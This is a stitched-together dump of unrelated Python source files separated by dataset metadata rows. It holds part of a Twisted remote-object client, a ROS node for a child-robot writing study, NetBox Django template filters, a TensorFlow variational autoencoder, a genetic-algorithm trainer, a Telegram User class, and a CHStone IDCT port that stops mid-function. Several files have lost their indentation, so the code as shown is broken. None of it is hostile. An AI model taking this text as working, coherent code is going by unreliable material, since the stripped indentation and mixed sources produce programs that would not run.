obj3_def = getSomeObjectAt("localhost", 8800, 30, "three")
obj3_def.addCallbacks(got_obj3)
reactor.run()
def got_rootobj(rootobj):
print "got root object:", rootobj
print "telling root object to do foo(A)"
rootobj.callRemote("foo", "A")
def got_obj2(obj2):
print "got second object:", obj2
print "telling second object to do foo(B)"
obj2.callRemote("foo", "B")
def got_obj3(obj3):
print "got third object:", obj3
print "telling third object to do foo(C)"
obj3.callRemote("foo", "C")
class my_ObjectRetrieval(pb._ObjectRetrieval):
def __init__(self, broker, d, objname):
pb._ObjectRetrieval.__init__(self, broker, d)
self.objname = objname
def connectionMade(self):
assert not self.term, "How did this get called?"
x = self.broker.remoteForName(self.objname)
del self.broker
self.term = 1
self.deferred.callback(x)
def getSomeObjectAt(host, port, timeout=None, objname="root"):
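    # Like pb.getObjectAt(), but asks the broker for an arbitrary named remote
    # object instead of the default "root" object.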
from twisted.internet import defer
from twisted.spread.pb import Broker, BrokerClientFactory
d = defer.Deferred()
b = Broker(1)
bf = BrokerClientFactory(b)
my_ObjectRetrieval(b, d, objname)
if host == "unix":
# every time you use this, God kills a kitten
reactor.connectUNIX(port, bf, timeout)
else:
reactor.connectTCP(host, port, bf, timeout)
return d
main()
| gpl-3.0 | -4,227,292,638,903,783,400 | 29.931034 | 62 | 0.662765 | false | 3.340782 | false | false | false |
alexis-jacq/Mutual_Modelling | nodes/cowriter_mutual_modelling.py | 1 | 5953 | #!/usr/bin/env python
#coding: utf-8
import sys
import time
import rospy
import json
from std_msgs.msg import String, Empty, Float64
from mutualModelling.agent2 import Agent
# this node updates the models of agents (maintained by the robot) and publishes the robot's choice of action:
#-------------------------------------------------------------------------------------------------
pub_robot_action = rospy.Publisher('robot_action_topic', String, queue_size=1)
# create a mutual modeller agent "robot" that also model an agent "human" in cowriter:
#-------------------------------------------------------------------------------------
ROBOT_NAME = "Mimi"
HUMAN_NAME = "Child"
ALL_NAMES = [ROBOT_NAME, HUMAN_NAME]
robot_percepts = ["child_progress","reward","punish","justified_reward","justified_punish","justified_new_word","with_me"]
robot_actions = ["converges","diverges","exaggerates","looks_tablet","looks_child_head","looks_out","looks_experimentator","looks_selection_tablet","points_tablet"]
robot_rewards = [["justified_reward",1.,1.],["justified_punish",1.,1],["with_me",1.,1.],["with_me",-1.,-1.],["child_progress",1.,1.],["justified_new_word",1.,1.]]
#robot_instincts = [[HUMAN_NAME+"_looks_robot_head",1.,"looks_child_head"],[HUMAN_NAME+"_looks_robot_head",1.,"looks_tablet"], [HUMAN_NAME+"_looks_tablet",1.,"looks_child_head"],[HUMAN_NAME+"_looks_tablet",1.,"looks_tablet"], [HUMAN_NAME+"_looks_noise",1.,"looks_child_head"],[HUMAN_NAME+"_looks_noise",1.,"mimics"], [HUMAN_NAME+"_looks_selection_tablet",1.,"looks_selection_tablet"], [HUMAN_NAME+"_looks_experimentator",1.,"looks_experimentator"]]
#robot = Agent(ROBOT_NAME,ALL_NAMES,robot_percepts,robot_actions,robot_rewards,robot_instincts)
robot = Agent(ROBOT_NAME,ALL_NAMES,robot_percepts,robot_actions,robot_rewards)
# the point of attention of the human is used to define what action of the robot is observed by the child:
#---------------------------------------------------------------------------------------------------------
objects = {"experimentator","selection_tablet","tablet","robot_head","out"}
human_attention = ""
# what the human can perceive about robot actions given his point of attention:
visible_for_human_from = {"tablet":["converges","diverges"], "robot_head":["looks_tablet","looks_child_head","looks_out","points_tablet","looks_experimentator"]}
# what the robot is expected to perceive about human action given robot's attention:
# (the robot is not expected (by the child) to differentiate justified/unjustified behavior of the child)
visible_for_robot_from = {"tablet":["punishes","rewards","sends_demo"],"selection_tablet":["sends_new_word"], "child_head":["looks_tablet","looks_robot_head","looks_out","looks_experimentator"]}
# when an agent do/observe something the mutual models (by the robot) are updated:
#---------------------------------------------------------------------------------
models_percepts = {}
models_actions = {}
human_target = "_"
robot_target = "_"
last_info = ""
def onChangeRobotTarget(msg):
global robot_target
robot_target = str(msg.data)
def onChangeHumanTarget(msg):
global human_target
human_target = str(msg.data)
def onChangeHumanWMN(msg):
global last_info
delta_wmn = msg.data
if last_info!=str(delta_wmn):
models_percepts.setdefault(ROBOT_NAME,[]).append(("with_me",delta_wmn))
makeDecision()
last_info = str(delta_wmn)
def onRobotAction(msg):
global models_actions
global models_percepts
global last_info
action = str(msg.data)
if last_info!=action:
if human_target in visible_for_human_from:
if action in visible_for_human_from[human_target]:
models_actions[HUMAN_NAME+':'+ROBOT_NAME] = action
models_percepts.setdefault(HUMAN_NAME,[]).append((ROBOT_NAME+"_"+action,1.))
rospy.loginfo(ROBOT_NAME+"_"+action)
rospy.loginfo(".........................................")
makeDecision()
last_info=action
def onHumanAction(msg):
global models_actions
global models_percepts
global last_info
action = str(msg.data)
if last_info!=action:
models_actions[HUMAN_NAME] = action
models_percepts.setdefault(ROBOT_NAME,[]).append((HUMAN_NAME+'_'+action,1.))
rospy.loginfo(HUMAN_NAME+'_'+action)
rospy.loginfo("////////////////////////////////////////")
if robot_target in visible_for_robot_from:
if action in visible_for_robot_from[robot_target]:
models_percepts.setdefault(HUMAN_NAME+':'+ROBOT_NAME,[]).append((HUMAN_NAME+"_"+action,1.))
makeDecision()
last_info=action
def makeDecision():
global robot
global models_actions
global models_percepts
new_robot_action = None
if models_actions:
new_robot_action = robot.update_models(None,models_percepts,models_actions)
rospy.loginfo(models_percepts)
rospy.loginfo(models_actions)
#rospy.loginfo(test)
rospy.loginfo("----------------------------------------")
if new_robot_action:
msg = String()
msg.data = new_robot_action
pub_robot_action.publish(msg)
models_percepts = {}
models_actions = {}
rospy.sleep(1.0)
# TODO:
"""
def onRobotObs(msg):
def onHumanObs(msg):
"""
if __name__=='__main__':
rospy.init_node("cowriter_mutual_modelling")
while(True):
rospy.Subscriber('robot_action_topic', String, onRobotAction )
rospy.Subscriber('human_action_topic', String, onHumanAction)
rospy.Subscriber('robot_target_topic', String, onChangeRobotTarget)
rospy.Subscriber('human_target_topic', String, onChangeHumanTarget)
rospy.Subscriber('human_wmn_topic', Float64, onChangeHumanWMN)
#rospy.Subscriber('robot_obs_topic', String, onRobotObs)
#rospy.Subscriber('human_obs_topic', String, onHumanObs)
rospy.sleep(1.0)
rospy.spin()
| isc | 3,709,407,553,419,079,000 | 42.772059 | 448 | 0.624055 | false | 3.47519 | false | false | false |
rfdrake/netbox | netbox/utilities/templatetags/helpers.py | 1 | 2526 | from markdown import markdown
from django import template
from django.utils.safestring import mark_safe
register = template.Library()
#
# Filters
#
@register.filter()
def oneline(value):
"""
Replace each line break with a single space
"""
return value.replace('\n', ' ')
@register.filter()
def getlist(value, arg):
"""
Return all values of a QueryDict key
"""
return value.getlist(arg)
@register.filter(is_safe=True)
def gfm(value):
"""
Render text as GitHub-Flavored Markdown
"""
html = markdown(value, extensions=['mdx_gfm'])
return mark_safe(html)
@register.filter()
def startswith(value, arg):
"""
Test whether a string starts with the given argument
"""
return str(value).startswith(arg)
@register.filter()
def user_can_add(model, user):
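    # Django permission names take the form "<app_label>.<codename>".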
    perm_name = '{}.add_{}'.format(model._meta.app_label, model.__class__.__name__.lower())
return user.has_perm(perm_name)
@register.filter()
def user_can_change(model, user):
    perm_name = '{}.change_{}'.format(model._meta.app_label, model.__class__.__name__.lower())
return user.has_perm(perm_name)
@register.filter()
def user_can_delete(model, user):
    perm_name = '{}.delete_{}'.format(model._meta.app_label, model.__class__.__name__.lower())
return user.has_perm(perm_name)
#
# Tags
#
@register.simple_tag()
def querystring_toggle(request, multi=True, page_key='page', **kwargs):
"""
Add or remove a parameter in the HTTP GET query string
"""
new_querydict = request.GET.copy()
# Remove page number from querystring
try:
new_querydict.pop(page_key)
except KeyError:
pass
# Add/toggle parameters
for k, v in kwargs.items():
values = new_querydict.getlist(k)
if k in new_querydict and v in values:
values.remove(v)
new_querydict.setlist(k, values)
elif not multi:
new_querydict[k] = v
else:
new_querydict.update({k: v})
querystring = new_querydict.urlencode()
if querystring:
return '?' + querystring
else:
return ''
@register.inclusion_tag('utilities/templatetags/utilization_graph.html')
def utilization_graph(utilization, warning_threshold=75, danger_threshold=90):
"""
Display a horizontal bar graph indicating a percentage of utilization.
"""
return {
'utilization': utilization,
'warning_threshold': warning_threshold,
'danger_threshold': danger_threshold,
}
| apache-2.0 | 3,335,065,604,694,656,500 | 22.174312 | 94 | 0.638559 | false | 3.618911 | false | false | false |
brain-research/acai | vae.py | 1 | 5092 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env python
"""Variational autoencoder.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl import app
from absl import flags
import tensorflow as tf
from lib import data, layers, train, utils, classifiers
FLAGS = flags.FLAGS
class VAE(train.AE):
def model(self, latent, depth, scales, beta):
x = tf.placeholder(tf.float32,
[None, self.height, self.width, self.colors], 'x')
l = tf.placeholder(tf.float32, [None, self.nclass], 'label')
h = tf.placeholder(
tf.float32,
[None, self.height >> scales, self.width >> scales, latent], 'h')
def encoder(x):
return layers.encoder(x, scales, depth, latent, 'ae_enc')
def decoder(h):
return layers.decoder(h, scales, depth, self.colors, 'ae_dec')
encode = encoder(x)
with tf.variable_scope('ae_latent'):
encode_shape = tf.shape(encode)
encode_flat = tf.layers.flatten(encode)
latent_dim = encode_flat.get_shape()[-1]
q_mu = tf.layers.dense(encode_flat, latent_dim)
log_q_sigma_sq = tf.layers.dense(encode_flat, latent_dim)
q_sigma = tf.sqrt(tf.exp(log_q_sigma_sq))
q_z = tf.distributions.Normal(loc=q_mu, scale=q_sigma)
q_z_sample = q_z.sample()
q_z_sample_reshaped = tf.reshape(q_z_sample, encode_shape)
p_x_given_z_logits = decoder(q_z_sample_reshaped)
p_x_given_z = tf.distributions.Bernoulli(logits=p_x_given_z_logits)
ae = 2*tf.nn.sigmoid(p_x_given_z_logits) - 1
decode = 2*tf.nn.sigmoid(decoder(h)) - 1
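        # The next two statements are the closed-form KL divergence between the
        # diagonal Gaussian q(z|x) = N(mu, sigma^2) and the standard normal prior,
        #   KL = 0.5 * sum(mu^2 + sigma^2 - log(sigma^2) - 1),
        # averaged over the batch.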
loss_kl = 0.5*tf.reduce_sum(
-log_q_sigma_sq - 1 + tf.exp(log_q_sigma_sq) + q_mu**2)
loss_kl = loss_kl/tf.to_float(tf.shape(x)[0])
x_bernoulli = 0.5*(x + 1)
loss_ll = tf.reduce_sum(p_x_given_z.log_prob(x_bernoulli))
loss_ll = loss_ll/tf.to_float(tf.shape(x)[0])
elbo = loss_ll - beta*loss_kl
utils.HookReport.log_tensor(loss_kl, 'loss_kl')
utils.HookReport.log_tensor(loss_ll, 'loss_ll')
utils.HookReport.log_tensor(elbo, 'elbo')
xops = classifiers.single_layer_classifier(
tf.stop_gradient(encode), l, self.nclass)
xloss = tf.reduce_mean(xops.loss)
utils.HookReport.log_tensor(xloss, 'classify_latent')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
ae_vars = tf.global_variables('ae_')
xl_vars = tf.global_variables('single_layer_classifier')
with tf.control_dependencies(update_ops):
train_ae = tf.train.AdamOptimizer(FLAGS.lr).minimize(
-elbo, var_list=ae_vars)
train_xl = tf.train.AdamOptimizer(FLAGS.lr).minimize(
xloss, tf.train.get_global_step(), var_list=xl_vars)
ops = train.AEOps(x, h, l, q_z_sample_reshaped, decode, ae,
tf.group(train_ae, train_xl),
classify_latent=xops.output)
n_interpolations = 16
n_images_per_interpolation = 16
def gen_images():
return self.make_sample_grid_and_save(
ops, interpolation=n_interpolations,
height=n_images_per_interpolation)
recon, inter, slerp, samples = tf.py_func(
gen_images, [], [tf.float32]*4)
tf.summary.image('reconstruction', tf.expand_dims(recon, 0))
tf.summary.image('interpolation', tf.expand_dims(inter, 0))
tf.summary.image('slerp', tf.expand_dims(slerp, 0))
tf.summary.image('samples', tf.expand_dims(samples, 0))
return ops
def main(argv):
del argv # Unused.
batch = FLAGS.batch
dataset = data.get_dataset(FLAGS.dataset, dict(batch_size=batch))
scales = int(round(math.log(dataset.width // FLAGS.latent_width, 2)))
model = VAE(
dataset,
FLAGS.train_dir,
latent=FLAGS.latent,
depth=FLAGS.depth,
scales=scales,
beta=FLAGS.beta)
model.train()
if __name__ == '__main__':
flags.DEFINE_integer('depth', 64, 'Depth of first for convolution.')
flags.DEFINE_integer(
'latent', 16,
'Latent space depth, the total latent size is the depth multiplied by '
'latent_width ** 2.')
flags.DEFINE_integer('latent_width', 4, 'Width of the latent space.')
flags.DEFINE_float('beta', 1.0, 'ELBO KL term scale.')
app.run(main)
| apache-2.0 | -914,411,565,567,096,600 | 36.718519 | 79 | 0.616261 | false | 3.347798 | false | false | false |
bluemini/agenetic | ga.py | 1 | 14226 | #!/usr/bin/env python
# Copyright (c) 2012, Nick Harvey
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the <ORGANIZATION> nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import Matrix, random, copy, sys
class ga:
def __init__(self):
self.population = []
self.coeff_size = 0
def seedGA(self, size, inSize, hiddenSize, outSize):
'Creates a new set of matrices for the neural network'
self.size = size
self.inSize = inSize
self.hiddenSize = hiddenSize
self.outSize = outSize
self.coeff_size = (inSize * hiddenSize) + hiddenSize + (hiddenSize * outSize) + outSize
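		# coeff_size is the length of the flattened genome: input->hidden weights,
		# hidden thresholds, hidden->output weights and output thresholds.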
for i in range(size):
matrices = {}
matrices["first_weights"] = self.getWeights(inSize, hiddenSize)
matrices["first_thresholds"] = self.getThresholds(hiddenSize)
matrices["second_weights"] = self.getWeights(hiddenSize, outSize)
matrices["second_thresholds"] = self.getThresholds(outSize)
self.population.append(matrices)
def getInputSize(self):
return self.inSize
def getHiddenSize(self):
return self.hiddenSize
def getOutputSize(self):
return self.outSize
def setGA2(self, population):
self.population = population
self.size = len(self.population)
def setGA(self, population):
self.population = population
self.size = len(self.population)
temp = population[0]
self.inSize = temp["first_weights"].getWidth()
self.hiddenSize = temp["first_thresholds"].getHeight()
self.outSize = temp["second_weights"].getHeight()
self.coeff_size = (self.inSize * self.hiddenSize) + self.hiddenSize + (self.hiddenSize * self.outSize) + self.outSize
def getWeights(self, width, height):
m = Matrix.Matrix()
m.setWidth(width)
m.setHeight(height)
m.randomFill(0, 1)
return m
def getThresholds(self, height):
m = Matrix.Matrix()
m.setHeight(height)
m.randomFill(0, 2)
return m
def getPopulation(self):
return self.population
def mateParents(self, firstParentId, secondParentId, intest=False):
		'''Takes the ids of two chromosomes, picks a crossover point and then
		joins the first part of chromosome one (before the crossover location)
		with the second part of chromosome two (after the crossover location).
		It then does the opposite with the first part of chromosome two and the
		second part of chromosome one.'''
parent1 = self.population[firstParentId]
parent2 = self.population[secondParentId]
selector = int(random.random() * self.coeff_size)
children = [parent1.copy(), parent2.copy()]
crossover_index = 0
if intest:
print("Mating parents:", selector)
# print("selector:", selector, self.coeff_size)
if selector < (self.inSize * self.hiddenSize):
selector_row = int(selector/self.inSize)
selector_col = selector % self.inSize
crossover_loc = "first_weights"
crossover_index = 0
# print("Crossing first weights", selector, selector_row, selector_col)
else:
# child["first_weights"] = parent1["first_weights"].copy()
selector = selector - (self.inSize * self.hiddenSize)
if selector < self.hiddenSize:
selector_row = selector
selector_col = 0
crossover_loc = "first_thresholds"
crossover_index = 1
# print("Crossing first thresholds", selector, selector_row, selector_col)
else:
# child["first_thresholds"] = parent1["first_thresholds"].copy()
selector = selector - (self.hiddenSize)
if selector < (self.hiddenSize * self.outSize):
selector_row = int(selector/self.hiddenSize)
selector_col = selector % self.hiddenSize
crossover_loc = "second_weights"
crossover_index = 2
# print("Crossing second weights", selector, selector_row, selector_col)
else:
# child["second_weights"] = parent1["second_weights"].copy()
selector = selector - (self.hiddenSize * self.outSize)
selector_row = selector
selector_col = 0
crossover_loc = "second_thresholds"
crossover_index = 3
# print("Crossing second thresholds", selector, selector_row, selector_col)
if intest:
print("Crossover location:", crossover_loc)
children[0][crossover_loc] = self.crossOver(parent1[crossover_loc], parent2[crossover_loc], selector_row, selector_col)
children[1][crossover_loc] = self.crossOver(parent2[crossover_loc], parent1[crossover_loc], selector_row, selector_col)
## then merge the remaining matrices into the new chromozone
if crossover_index < 1:
children[0]['first_thresholds'] = copy.deepcopy(parent2['first_thresholds'])
children[1]['first_thresholds'] = copy.deepcopy(parent1['first_thresholds'])
if crossover_index < 2:
children[0]['second_weights'] = copy.deepcopy(parent2['second_weights'])
children[1]['second_weights'] = copy.deepcopy(parent1['second_weights'])
if crossover_index < 3:
children[0]['second_thresholds'] = copy.deepcopy(parent2['second_thresholds'])
children[1]['second_thresholds'] = copy.deepcopy(parent1['second_thresholds'])
return children
def crossOver(self, parent_one, parent_two, row, col, intest=False):
"""crossover determines which chromozones progress to the next population"""
rows = parent_one.getHeight()
cols = parent_one.getWidth()
cross = row*rows + col
m = Matrix.Matrix().setWidth(cols).setHeight(rows).init()
for i in range(rows):
for j in range(cols):
if (i*rows+j) < cross:
m.setElem(i, j, parent_one.getElem(i, j))
else:
m.setElem(i, j, parent_two.getElem(i, j))
return m
def mutatePopulation(self, survivors, mutationRate, crossOver):
		'''Mutates a population of chromosomes.
		There are a number of approaches to achieving this. This approach uses a primary
		random number in the range (0..3) to select which of the 4 matrices in the ANN
		to mutate. Once it has picked which one, it uses a second random number in the
		range (0..number_of_elements) to choose which value to change.
		This is simpler than the alternative algorithm below, which biases the
		probability by the size of the matrix; as a result, this approach mutates the
		smaller matrices much more frequently.'''
newPopulation = []
mutations = [0 for i in range(4)]
for matrices in survivors:
# matrices = self.population[s]
if random.random() < mutationRate:
matrixToMutate = int(random.random() * 4)
print("Mutating", str(matrixToMutate))
# selector refers to the first weights matrix ([ INPUT x HIDDEN ])
if matrixToMutate == 0:
selector_col = int(random.random() * self.inSize)
selector_row = int(random.random() * self.hiddenSize)
matrices["first_weights"].setElem(selector_row, selector_col, random.random())
mutations[0] += 1
# selector refers to the first thresholds matrix
elif matrixToMutate == 1:
selector = int(random.random() * self.hiddenSize)
currVal = matrices["first_thresholds"].getElem(selector, 0)
currVal += (0.1 - random.random()*0.2)
if currVal > 2:
currVal = 2
elif currVal < 0:
currVal = 0
matrices["first_thresholds"].setElem(selector, 0, currVal)
mutations[1] += 1
# print("Mutation in first threshold", selector)
# selector refers to the second weights matrix ([ HIDDEN x OUTPUT ])
elif matrixToMutate == 2:
selector_col = int(random.random() * self.hiddenSize)
selector_row = int(random.random() * self.outSize)
matrices["second_weights"].setElem(selector_row, selector_col, random.random())
mutations[2] += 1
# print("Mutation in second matrix", selector, selector_row, selector_col)
# selector refers to the second thresholds
elif matrixToMutate == 3:
selector = int(random.random() * self.outSize)
currVal = matrices["second_thresholds"].getElem(selector, 0)
currVal += (0.1 - random.random()*0.2)
if currVal > 2:
currVal = 2
elif currVal < 0:
currVal = 0
matrices["second_thresholds"].setElem(selector, 0, currVal)
mutations[3] += 1
#print("Mutation in second threshold")
else:
print("Unknown index for the matrix to mutate:", matrixToMutate)
newPopulation.append(matrices)
self.population = newPopulation
return mutations
def mutatePopulationSingle(self, survivors, mutationRate, crossOver):
newPopulation = []
mutations = [0 for i in range(4)]
for matrices in survivors:
# matrices = self.population[s]
if random.random() < mutationRate:
selector = int(random.random() * self.coeff_size)
# selector refers to the first weights matrix
if selector < (self.inSize * self.hiddenSize):
selector_row = int(selector/self.inSize)
selector_col = selector % self.inSize
try:
matrices["first_weights"].setElem(selector_row, selector_col, random.random())
except:
print("Selector: ", selector)
print("Width: ", matrices["first_weights"].getWidth(), self.inSize, len(matrices["first_weights"].getData()[0]))
print("Height: ", matrices["first_weights"].getHeight(), self.hiddenSize, len(matrices["first_weights"].getData()))
print("Problems with setElem...")
print(selector_row, selector_col)
sys.exit()
# print("Mutation in first matrix", selector, selector_row, selector_col)
mutations[0] += 1
else:
selector = selector - (self.inSize * self.hiddenSize)
# selector refers to the first thresholds matrix
if selector < self.hiddenSize:
currVal = matrices["first_thresholds"].getElem(selector, 0)
currVal += (0.1 - random.random()*0.2)
if currVal > 2:
currVal = 2
elif currVal < 0:
currVal = 0
matrices["first_thresholds"].setElem(selector, 0, currVal)
mutations[1] += 1
# print("Mutation in first threshold", selector)
pass
else:
selector = selector - (self.hiddenSize)
# selector refers to the second weights matrix
if selector < (self.hiddenSize * self.outSize):
selector_row = int(selector/self.outSize)
selector_col = selector % self.outSize
matrices["second_weights"].setElem(selector_row, selector_col, random.random())
mutations[2] += 1
# print("Mutation in second matrix", selector, selector_row, selector_col)
# selector refers to the second thresholds
else:
selector = selector - (self.hiddenSize * self.outSize)
currVal = matrices["second_thresholds"].getElem(selector, 0)
currVal += (0.1 - random.random()*0.2)
if currVal > 2:
currVal = 2
elif currVal < 0:
currVal = 0
matrices["second_thresholds"].setElem(selector, 0, currVal)
mutations[3] += 1
#print("Mutation in second threshold")
newPopulation.append(matrices)
self.population = newPopulation
return mutations
def roulette(self, scores, intest=False):
nextGen = []
selector = int(random.random() * self.size)
selectors = []
beta = 0.0
mw = max(scores)
roul = roulette(scores)
for n in range(self.size):
pair = []
## no breeding, just fittest lives
if intest:
pair = [0, 1]
print("Testing crossover,", pair)
## breed the pair
nextGen.extend(self.mateParents(pair[0], pair[1], intest))
# purely for testing
if True:
for i in range(2):
pair.append(roul.getNext())
## breed the pair
nextGen.extend(self.mateParents(pair[0], pair[1]))
# just random roulette wheel picker and append to next gen..
else:
nextGen.append(copy.deepcopy(self.population[roul.getNext()]))
# print("Selected: ", selector)
selectors.append(selector)
# if we've grown the next generation to the maxpop size, then finish
if len(nextGen) >= self.size:
break
# print(selectors)
return nextGen
# return self.population
def validate(self):
"Verifies that the sizes of the internal ANN matrices match those of the settings"
valid = True
for p in self.population:
valid = valid and (p["first_weights"].getWidth() == self.inSize)
valid = valid and (p["first_weights"].getHeight() == self.hiddenSize)
valid = valid and (p["first_thresholds"].getWidth() == 1)
valid = valid and (p["first_thresholds"].getHeight() == self.hiddenSize)
return valid
class roulette:
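	# Fitness-proportionate (roulette wheel) selection: getNext() advances around
	# the wheel by a random amount, so index i is returned with a probability
	# roughly proportional to counts[i].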
def __init__(self, counts):
self.data = counts
self.mw = sum(self.data)
self.size = len(self.data)
self.beta = 0
self.selector = 0
def getNext(self):
self.beta += (random.random() * self.mw * 2.0)
while (self.beta > self.data[self.selector]):
self.beta -= self.data[self.selector]
self.selector = (self.selector + 1) % self.size
return self.selector
| bsd-3-clause | 4,133,773,500,725,697,000 | 36.448649 | 121 | 0.675524 | false | 3.490186 | true | false | false |
urban48/python-telegram-bot | telegram/user.py | 6 | 1109 | #!/usr/bin/env python
from telegram import TelegramObject
class User(TelegramObject):
def __init__(self,
id,
first_name,
last_name=None,
username=None):
self.id = id
self.first_name = first_name
self.last_name = last_name
self.username = username
@property
def name(self):
if self.username:
return '@%s' % self.username
if self.last_name:
return '%s %s' % (self.first_name, self.last_name)
return self.first_name
@staticmethod
def de_json(data):
return User(id=data.get('id', None),
first_name=data.get('first_name', None),
last_name=data.get('last_name', None),
username=data.get('username', None))
def to_dict(self):
data = {'id': self.id,
'first_name': self.first_name}
if self.last_name:
data['last_name'] = self.last_name
if self.username:
data['username'] = self.username
return data
| gpl-2.0 | -6,433,096,805,626,666,000 | 26.725 | 62 | 0.513977 | false | 3.946619 | false | false | false |
ktok07b6/polyphony | tests/chstone/jpeg/chenidct.py | 1 | 7203 | from polyphony import testbench
'''
+--------------------------------------------------------------------------+
| CHStone : A suite of Benchmark Programs for C-based High-Level Synthesis |
| ======================================================================== |
| |
| * Collected and Modified : Y. Hara, H. Tomiyama, S. Honda, |
| H. Takada and K. Ishii |
| Nagoya University, Japan |
| |
| * Remarks : |
| 1. This source code is reformatted to follow CHStone's style. |
| 2. Test vectors are added for CHStone. |
| 3. If "main_result" is 0 at the end of the program, the program is |
| successfully executed. |
| 4. Follow the copyright of each benchmark program. |
+--------------------------------------------------------------------------+
/*
* IDCT transformation of Chen algorithm
*
* @(#) $Id: chenidct.c,v 1.2 2003/07/18 10:19:21 honda Exp $
*/
/*************************************************************
Copyright (C) 1990, 1991, 1993 Andy C. Hung, all rights reserved.
PUBLIC DOMAIN LICENSE: Stanford University Portable Video Research
Group. If you use this software, you agree to the following: This
program package is purely experimental, and is licensed "as is".
Permission is granted to use, modify, and distribute this program
without charge for any purpose, provided this license/ disclaimer
notice appears in the copies. No warranty or maintenance is given,
either expressed or implied. In no event shall the author(s) be
liable to you or a third party for any special, incidental,
consequential, or other damages, arising out of the use or inability
to use the program for any purpose (or the loss of data), even if we
have been advised of such possibilities. Any public reference or
advertisement of this source code should refer to it as the Portable
Video Research Group (PVRG) code, and not by any author(s) (or
Stanford University) name.
*************************************************************/
/*
************************************************************
chendct.c
A simple DCT algorithm that seems to have fairly nice arithmetic
properties.
W. H. Chen, C. H. Smith and S. C. Fralick "A fast computational
algorithm for the discrete cosine transform," IEEE Trans. Commun.,
vol. COM-25, pp. 1004-1009, Sept 1977.
************************************************************
'''
# Cos constants
c1d4 = 362
c1d8 = 473
c3d8 = 196
c1d16 = 502
c3d16 = 426
c5d16 = 284
c7d16 = 100
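# These constants are cos(k*pi/16) in fixed point, scaled by 2**9 = 512
# (e.g. cos(pi/4)*512 ~= 362), which is why MSCALE below shifts right by 9 bits.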
'''
/*
*
* ChenIDCT() implements the Chen inverse dct. Note that there are two
* input vectors that represent x=input, and y=output, and must be
* defined (and storage allocated) before this routine is called.
*/
'''
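# Note: x and y are flat lists of 64 integers holding an 8x8 block in row-major
# order; the transformed block is written into y and the function returns 0.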
def ChenIDct(x:list, y:list):
def LS(r,s):
return r << s
def RS(r,s):
return r >> s # Caution with rounding...
def MSCALE(expr):
return RS(expr, 9)
# Loop over columns
for i in range(8):
b0 = LS(x[i + 0], 2)
a0 = LS(x[i + 8], 2)
b2 = LS(x[i + 16], 2)
a1 = LS(x[i + 24], 2)
b1 = LS(x[i + 32], 2)
a2 = LS(x[i + 40], 2)
b3 = LS(x[i + 48], 2)
a3 = LS(x[i + 56], 2)
# Split into even mode b0 = x0 b1 = x4 b2 = x2 b3 = x6.
# And the odd terms a0 = x1 a1 = x3 a2 = x5 a3 = x7.
c0 = MSCALE((c7d16 * a0) - (c1d16 * a3))
c1 = MSCALE((c3d16 * a2) - (c5d16 * a1))
c2 = MSCALE((c3d16 * a1) + (c5d16 * a2))
c3 = MSCALE((c1d16 * a0) + (c7d16 * a3))
# First Butterfly on even terms.
a0 = MSCALE(c1d4 * (b0 + b1))
a1 = MSCALE(c1d4 * (b0 - b1))
a2 = MSCALE((c3d8 * b2) - (c1d8 * b3))
a3 = MSCALE((c1d8 * b2) + (c3d8 * b3))
b0 = a0 + a3
b1 = a1 + a2
b2 = a1 - a2
b3 = a0 - a3
# Second Butterfly
a0 = c0 + c1
a1 = c0 - c1
a2 = c3 - c2
a3 = c3 + c2
c0 = a0
c1 = MSCALE(c1d4 * (a2 - a1))
c2 = MSCALE(c1d4 * (a2 + a1))
c3 = a3
y[i + 0] = b0 + c3
y[i + 8] = b1 + c2
y[i + 16] = b2 + c1
y[i + 24] = b3 + c0
y[i + 32] = b3 - c0
y[i + 40] = b2 - c1
y[i + 48] = b1 - c2
y[i + 56] = b0 - c3
# Loop over rows
for i in range(8):
idx = LS(i, 3)
b0 = y[idx+0]
a0 = y[idx+1]
b2 = y[idx+2]
a1 = y[idx+3]
b1 = y[idx+4]
a2 = y[idx+5]
b3 = y[idx+6]
a3 = y[idx+7]
# Split into even mode b0 = x0 b1 = x4 b2 = x2 b3 = x6.
# And the odd terms a0 = x1 a1 = x3 a2 = x5 a3 = x7.
c0 = MSCALE((c7d16 * a0) - (c1d16 * a3))
c1 = MSCALE((c3d16 * a2) - (c5d16 * a1))
c2 = MSCALE((c3d16 * a1) + (c5d16 * a2))
c3 = MSCALE((c1d16 * a0) + (c7d16 * a3))
# First Butterfly on even terms.
a0 = MSCALE(c1d4 * (b0 + b1))
a1 = MSCALE(c1d4 * (b0 - b1))
a2 = MSCALE((c3d8 * b2) - (c1d8 * b3))
a3 = MSCALE((c1d8 * b2) + (c3d8 * b3))
# Calculate last set of b's
